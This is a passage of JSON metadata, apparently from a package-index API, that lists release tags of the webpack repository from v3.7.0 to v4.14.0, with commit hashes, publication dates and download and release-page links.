v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"n